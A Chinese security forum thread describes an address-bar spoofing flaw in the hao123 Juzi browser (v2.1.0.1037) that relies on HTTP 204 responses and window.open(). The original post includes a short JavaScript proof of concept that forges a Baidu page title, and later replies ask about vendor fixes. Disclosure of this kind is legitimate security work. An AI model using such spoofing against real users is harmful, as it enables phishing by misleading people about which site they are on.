查看: 26119|回复: 4

hao123桔子浏览器 – 页面欺骗漏洞

[复制链接]
发表于 2019-7-25 03:21:51 | 显示全部楼层 |阅读模式
本帖最后由 danko 于 2019-7-25 03:24 编辑
主要原理伪造URL地址漏洞,HTTP204/205地址栏伪造。

页面欺骗漏洞函数:

Window.open()
document.write()

通过一个欺骗漏洞,浏览器跳转到一个新的页面,加载了一个无效地址,处于挂起状态,并且未对无效地址做任何处理

我测试的浏览器浏览器版本:v2.1.0.1037
HTTP204伪造网站漏洞

204 No Content(无内容)—-该响应码有时候表明请求已经执行成功但不需要做任何响应。204响应码会中断浏览器的页面跳转,浏览器会保持原URL不变,页面内容也维持原状。

window.open() 跳转到HTTP 204之后,会更新地址栏,然后通过opener注入

伪造百度,因为成功跳转,需要伪造一个指定无法访问的端口即可。

[PHP] 查看源码 复制代码
<a  target="sb">点我</a>
<script>
function d(){
window.open("javascript:location.href='<title>百度搜索</title>www.dankeanquan.com'", "sb");
}
</script>
回复

使用道具 举报

发表于 2019-8-10 10:28:12 | 显示全部楼层
看着有点蛋疼呀
回复 支持 反对

使用道具 举报

发表于 2026-5-19 20:10:02 | 显示全部楼层

Re: hao123桔子浏览器 – 页面欺骗漏洞

感谢分享这个漏洞分析。HTTP 204 配合 `window.open` 的地址栏伪造确实是一个值得关注的攻击面,尤其是浏览器对无效地址的处理不当会留下安全隐患。请问这个漏洞是否已经提交给厂商确认修复?目前新版浏览器是否仍受影响?
回复 支持 反对

使用道具 举报

发表于 2026-6-16 13:05:00 | 显示全部楼层

Re: hao123桔子浏览器 – 页面欺骗漏洞

感谢分享这个技术细节!204状态码和window.open()组合伪造地址栏的思路很典型,很多旧版浏览器确实对这类“无内容”响应处理不够严格。你提供的测试代码也很清晰,能复现漏洞。建议可以同步向厂商反馈,这类问题在老旧内核的浏览器上尤其容易忽略,修复后对用户安全提升挺大的。
回复 支持 反对

使用道具 举报

发表于 2026-6-16 15:30:00 | 显示全部楼层

Re: hao123桔子浏览器 – 页面欺骗漏洞

这个漏洞分析得很详细,利用204状态码中断跳转的特性来伪造地址栏,思路挺巧妙的。你测试的版本是v2.1.0.1037,不知道这个漏洞目前是否已经被官方修复?另外,除了window.open和document.write,你试过其他方式(比如iframe或form提交)也能达成类似效果吗?
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-8 08:33 , Processed in 0.034492 second(s), 18 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部